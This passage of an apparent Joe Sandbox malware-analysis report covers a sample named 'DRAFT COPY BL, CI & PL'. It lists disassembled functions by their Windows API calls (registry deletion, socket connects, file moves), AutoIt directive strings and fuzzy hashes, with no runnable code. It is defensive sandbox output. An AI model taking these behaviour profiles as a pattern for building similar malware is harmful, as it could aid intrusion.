                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: _wcsncpy$LocalTime
                                                                • String ID:
                                                                • API String ID: 2945705084-0
                                                                • Opcode ID: e657313103afc47efa6ef84ac87747dc660c17ec4a1c96a35d1cbc0c43040c83
                                                                • Instruction ID: 04c2757b2ff3fc8b823e4070a4bbbbccde84b408ec6c4796ab8eba0fd26909a1
                                                                • Opcode Fuzzy Hash: e657313103afc47efa6ef84ac87747dc660c17ec4a1c96a35d1cbc0c43040c83
                                                                • Instruction Fuzzy Hash: 66419266C1061476CB12EBF98C46ACFB3BC9F45311F508956F918E3221FB34A389C7A6
                                                                APIs
                                                                  • Part of subcall function 0099466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00993697,?), ref: 0099468B
                                                                  • Part of subcall function 0099466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00993697,?), ref: 009946A4
                                                                • lstrcmpiW.KERNEL32(?,?), ref: 009936B7
                                                                • _wcscmp.LIBCMT ref: 009936D3
                                                                • MoveFileW.KERNEL32(?,?), ref: 009936EB
                                                                • _wcscat.LIBCMT ref: 00993733
                                                                • SHFileOperationW.SHELL32(?), ref: 0099379F
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                                • String ID: \*.*
                                                                • API String ID: 1377345388-1173974218
                                                                • Opcode ID: c2f127606db5df65958e991be7cec34d7a0f1cc12710d4886d66387fccbc9f5e
                                                                • Instruction ID: e67ddd87ba80a0f942c230f67a0a6cdd1abaa8896d0fe5bd1c8ebeb26ac96172
                                                                • Opcode Fuzzy Hash: c2f127606db5df65958e991be7cec34d7a0f1cc12710d4886d66387fccbc9f5e
                                                                • Instruction Fuzzy Hash: 2D417471508344AECB52EF68D442ADFB7ECEF89390F40492EF499C3151EA34D689CB56
                                                                APIs
                                                                • _memset.LIBCMT ref: 009B72AA
                                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 009B7351
                                                                • IsMenu.USER32(?), ref: 009B7369
                                                                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 009B73B1
                                                                • DrawMenuBar.USER32 ref: 009B73C4
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Menu$Item$DrawInfoInsert_memset
                                                                • String ID: 0
                                                                • API String ID: 3866635326-4108050209
                                                                • Opcode ID: 2427a83819d0e578a9a306e96fdd0ede30216196d3d59c44534bc7aa6230be86
                                                                • Instruction ID: 7989fda274db879c38e947ed7b79cad858d9775651a6f8b18d05d440025e68a0
                                                                • Opcode Fuzzy Hash: 2427a83819d0e578a9a306e96fdd0ede30216196d3d59c44534bc7aa6230be86
                                                                • Instruction Fuzzy Hash: D7411875A04208AFDB20DFA4E984AEABBF8FB44360F148629FD1597250D730AD50EF50
                                                                APIs
                                                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 009B0FD4
                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 009B0FFE
                                                                • FreeLibrary.KERNEL32(00000000), ref: 009B10B5
                                                                  • Part of subcall function 009B0FA5: RegCloseKey.ADVAPI32(?), ref: 009B101B
                                                                  • Part of subcall function 009B0FA5: FreeLibrary.KERNEL32(?), ref: 009B106D
                                                                  • Part of subcall function 009B0FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 009B1090
                                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 009B1058
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                • String ID:
                                                                • API String ID: 395352322-0
                                                                • Opcode ID: 865392e93791a267735fde58d4fb553533b909234010f73060a9aec5b4ebdb55
                                                                • Instruction ID: 18a1028fda1c7776a73c283c12966b34372a6d1e3b9bdb0facec0aa221e7c39f
                                                                • Opcode Fuzzy Hash: 865392e93791a267735fde58d4fb553533b909234010f73060a9aec5b4ebdb55
                                                                • Instruction Fuzzy Hash: 39312D71910109BFDB15AF94DD99EFFB7BCEF08320F40026AF501A2151EB749E859AA0
                                                                APIs
                                                                • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 009B62EC
                                                                • GetWindowLongW.USER32(00E85388,000000F0), ref: 009B631F
                                                                • GetWindowLongW.USER32(00E85388,000000F0), ref: 009B6354
                                                                • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 009B6386
                                                                • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 009B63B0
                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 009B63C1
                                                                • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 009B63DB
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: LongWindow$MessageSend
                                                                • String ID:
                                                                • API String ID: 2178440468-0
                                                                • Opcode ID: f90f35b3ace52f58d291c94d0b0519b4a82cf6edf8962e2ca70c1e71fdaefd05
                                                                • Instruction ID: 0deee3667fc33a0b36623f30aeb278b8acaa909145c3dbe66815213a9fad39e8
                                                                • Opcode Fuzzy Hash: f90f35b3ace52f58d291c94d0b0519b4a82cf6edf8962e2ca70c1e71fdaefd05
                                                                • Instruction Fuzzy Hash: B431F230658555DFDB208F18DE84FA43BE5FB4A764F1902A8FA018B2B1CB75B840EB50
                                                                APIs
                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0098DB2E
                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0098DB54
                                                                • SysAllocString.OLEAUT32(00000000), ref: 0098DB57
                                                                • SysAllocString.OLEAUT32(?), ref: 0098DB75
                                                                • SysFreeString.OLEAUT32(?), ref: 0098DB7E
                                                                • StringFromGUID2.OLE32(?,?,00000028), ref: 0098DBA3
                                                                • SysAllocString.OLEAUT32(?), ref: 0098DBB1
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                • String ID:
                                                                • API String ID: 3761583154-0
                                                                • Opcode ID: 41140ae826fead657651e8665d814d65d3a1b05ab6c9e52160ce1e27ca2c2ef5
                                                                • Instruction ID: 1a595a13f92625d2abc41c78bec84a1ec37e027b16cbe428f23f3b275333d38e
                                                                • Opcode Fuzzy Hash: 41140ae826fead657651e8665d814d65d3a1b05ab6c9e52160ce1e27ca2c2ef5
                                                                • Instruction Fuzzy Hash: 8B219036605219AFDF10EFA9DC88CBB77ADEB09360B018635F914DB2A0D674DC4597A0
                                                                APIs
                                                                  • Part of subcall function 009A7D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 009A7DB6
                                                                • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 009A61C6
                                                                • WSAGetLastError.WSOCK32(00000000), ref: 009A61D5
                                                                • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 009A620E
                                                                • connect.WSOCK32(00000000,?,00000010), ref: 009A6217
                                                                • WSAGetLastError.WSOCK32 ref: 009A6221
                                                                • closesocket.WSOCK32(00000000), ref: 009A624A
                                                                • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 009A6263
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                                • String ID:
                                                                • API String ID: 910771015-0
                                                                • Opcode ID: 7ebc950780124a9503dd545d05e8c680e9acab1c35566913e6c66eb140bc452c
                                                                • Instruction ID: 4fe12bc402673752b8043974857c5583914a68ed5b7176a108b88587d2be4a56
                                                                • Opcode Fuzzy Hash: 7ebc950780124a9503dd545d05e8c680e9acab1c35566913e6c66eb140bc452c
                                                                • Instruction Fuzzy Hash: AA31AF31604108ABDF10AF64CC85FBE7BACEB86720F084169FD15E7291DB74AC049BA1
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: __wcsnicmp
                                                                • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                • API String ID: 1038674560-2734436370
                                                                • Opcode ID: dc0380d0e8efa0bb6fe30bff9675878f714e3cd4f7f11688dabf4c643edfebd4
                                                                • Instruction ID: 6fcbe64fbbbd1858ca2c34b37add9b8d15c7c65d70b8b683c9a30d7c35bc1c6a
                                                                • Opcode Fuzzy Hash: dc0380d0e8efa0bb6fe30bff9675878f714e3cd4f7f11688dabf4c643edfebd4
                                                                • Instruction Fuzzy Hash: 7021767260421666E620FB34AC23FA7739CEFD9348F10943AF84687291FBA09D45C3A5
                                                                APIs
                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0098DC09
                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0098DC2F
                                                                • SysAllocString.OLEAUT32(00000000), ref: 0098DC32
                                                                • SysAllocString.OLEAUT32 ref: 0098DC53
                                                                • SysFreeString.OLEAUT32 ref: 0098DC5C
                                                                • StringFromGUID2.OLE32(?,?,00000028), ref: 0098DC76
                                                                • SysAllocString.OLEAUT32(?), ref: 0098DC84
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                • String ID:
                                                                • API String ID: 3761583154-0
                                                                • Opcode ID: 150ce2cafa36c51a7fcce46e1bfcd9ef1341269e6d5aadaf800001164ee5004c
                                                                • Instruction ID: 57b674f600562041401dab7972053c4c6f4af1f62a93c1e6a6e231c39bdfd32e
                                                                • Opcode Fuzzy Hash: 150ce2cafa36c51a7fcce46e1bfcd9ef1341269e6d5aadaf800001164ee5004c
                                                                • Instruction Fuzzy Hash: C2218035609204AF9B10FFA8DD88DAB77EDEB48360B108225F954CB3A0DAB4DD41DB64
                                                                APIs
                                                                  • Part of subcall function 00931D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00931D73
                                                                  • Part of subcall function 00931D35: GetStockObject.GDI32(00000011), ref: 00931D87
                                                                  • Part of subcall function 00931D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00931D91
                                                                • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 009B7632
                                                                • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 009B763F
                                                                • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 009B764A
                                                                • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 009B7659
                                                                • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 009B7665
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$CreateObjectStockWindow
                                                                • String ID: Msctls_Progress32
                                                                • API String ID: 1025951953-3636473452
                                                                • Opcode ID: 16e4f49886d3a440b4a8d50d4cd095b7c180219cda1630ae0a03af60869d0a09
                                                                • Instruction ID: f3504ca51907d61081657bf8dabc5841b566aca77abf64dc4df66fbc52ac94e6
                                                                • Opcode Fuzzy Hash: 16e4f49886d3a440b4a8d50d4cd095b7c180219cda1630ae0a03af60869d0a09
                                                                • Instruction Fuzzy Hash: 7911B6B111421DBFEF159F64CC85EE7BF5DEF487A8F014215BB04A60A0CA729C21DBA4
                                                                APIs
                                                                • __init_pointers.LIBCMT ref: 00959AE6
                                                                  • Part of subcall function 00953187: EncodePointer.KERNEL32(00000000), ref: 0095318A
                                                                  • Part of subcall function 00953187: __initp_misc_winsig.LIBCMT ref: 009531A5
                                                                  • Part of subcall function 00953187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00959EA0
                                                                  • Part of subcall function 00953187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00959EB4
                                                                  • Part of subcall function 00953187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00959EC7
                                                                  • Part of subcall function 00953187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00959EDA
                                                                  • Part of subcall function 00953187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00959EED
                                                                  • Part of subcall function 00953187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00959F00
                                                                  • Part of subcall function 00953187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00959F13
                                                                  • Part of subcall function 00953187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00959F26
                                                                  • Part of subcall function 00953187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00959F39
                                                                  • Part of subcall function 00953187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00959F4C
                                                                  • Part of subcall function 00953187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00959F5F
                                                                  • Part of subcall function 00953187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00959F72
                                                                  • Part of subcall function 00953187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00959F85
                                                                  • Part of subcall function 00953187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00959F98
                                                                  • Part of subcall function 00953187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00959FAB
                                                                  • Part of subcall function 00953187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00959FBE
                                                                • __mtinitlocks.LIBCMT ref: 00959AEB
                                                                • __mtterm.LIBCMT ref: 00959AF4
                                                                  • Part of subcall function 00959B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00959AF9,00957CD0,009EA0B8,00000014), ref: 00959C56
                                                                  • Part of subcall function 00959B5C: _free.LIBCMT ref: 00959C5D
                                                                  • Part of subcall function 00959B5C: DeleteCriticalSection.KERNEL32(009EEC00,?,?,00959AF9,00957CD0,009EA0B8,00000014), ref: 00959C7F
                                                                • __calloc_crt.LIBCMT ref: 00959B19
                                                                • __initptd.LIBCMT ref: 00959B3B
                                                                • GetCurrentThreadId.KERNEL32 ref: 00959B42
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                 • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                • String ID:
                                                                • API String ID: 3567560977-0
                                                                • Opcode ID: 0fde95bb4b3f804d0eb371f8cb65d0176b0eacb418623c1553d8f5fe1d9d30a6
                                                                • Instruction ID: 6db70fb12665528a1020497e35cc797a162f449065462b86f94c8451084b9853
                                                                • Opcode Fuzzy Hash: 0fde95bb4b3f804d0eb371f8cb65d0176b0eacb418623c1553d8f5fe1d9d30a6
                                                                • Instruction Fuzzy Hash: 73F06D3251E711DAF624F77BBC0374A2698DB82736B204A19FC64D90D2FE20984943A0
                                                                APIs
                                                                • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00953F85), ref: 00954085
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0095408C
                                                                • EncodePointer.KERNEL32(00000000), ref: 00954097
                                                                • DecodePointer.KERNEL32(00953F85), ref: 009540B2
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                 • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                • String ID: RoUninitialize$combase.dll
                                                                • API String ID: 3489934621-2819208100
                                                                • Opcode ID: 03f59e9d93d4f922acb728be89bb3d9c298cd1411a522cc555ed20de55d39318
                                                                • Instruction ID: bdf91a35fd00cdf5c9cb69aa2f0f74e197c28f233c1d4bc992448ee0de062015
                                                                • Opcode Fuzzy Hash: 03f59e9d93d4f922acb728be89bb3d9c298cd1411a522cc555ed20de55d39318
                                                                • Instruction Fuzzy Hash: BAE04F7066C301EFDB509F71ED0CB153AA8B710796F108128F511D10E0CB7A5684EB01
                                                                APIs
                                                                • GetClientRect.USER32(?,?), ref: 00931DDC
                                                                • GetWindowRect.USER32(?,?), ref: 00931E1D
                                                                • ScreenToClient.USER32(?,?), ref: 00931E45
                                                                • GetClientRect.USER32(?,?), ref: 00931F74
                                                                • GetWindowRect.USER32(?,?), ref: 00931F8D
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                 • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Rect$Client$Window$Screen
                                                                • String ID:
                                                                • API String ID: 1296646539-0
                                                                • Opcode ID: b1a40f0f64b74e7739e8a627587f7c398b0cc55615cd026a17ef2032c4225106
                                                                • Instruction ID: 242571ce9fa0ab5c025de2ba832142996ac0e0d0ed41cdb54699a82a55d62ba2
                                                                • Opcode Fuzzy Hash: b1a40f0f64b74e7739e8a627587f7c398b0cc55615cd026a17ef2032c4225106
                                                                • Instruction Fuzzy Hash: 02B1397990024ADBDB10CFA9C5807EEB7B5FF08310F149529EC59DB264EB34AA90DF54
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                 • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: _memmove$__itow__swprintf
                                                                • String ID:
                                                                • API String ID: 3253778849-0
                                                                • Opcode ID: 8d95ba5007d8cc28eb6b142bf0a73089b308e5a7fb3111f813861fb28a5229a8
                                                                • Instruction ID: 4a05c7e9566e1f28b2809b96d63cc7ae2af11f0f1bcfc2fe2e6b50662fc70364
                                                                • Opcode Fuzzy Hash: 8d95ba5007d8cc28eb6b142bf0a73089b308e5a7fb3111f813861fb28a5229a8
                                                                • Instruction Fuzzy Hash: E1619A3050025A9BCF12EF68CC82FFE77A9AF85308F054919FC596B292DB75E909CB50
                                                                APIs
                                                                  • Part of subcall function 00937DE1: _memmove.LIBCMT ref: 00937E22
                                                                  • Part of subcall function 009B0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,009AFDAD,?,?), ref: 009B0E31
                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 009B02BD
                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 009B02FD
                                                                • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 009B0320
                                                                • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 009B0349
                                                                • RegCloseKey.ADVAPI32(?,?,00000000), ref: 009B038C
                                                                • RegCloseKey.ADVAPI32(00000000), ref: 009B0399
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                 • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
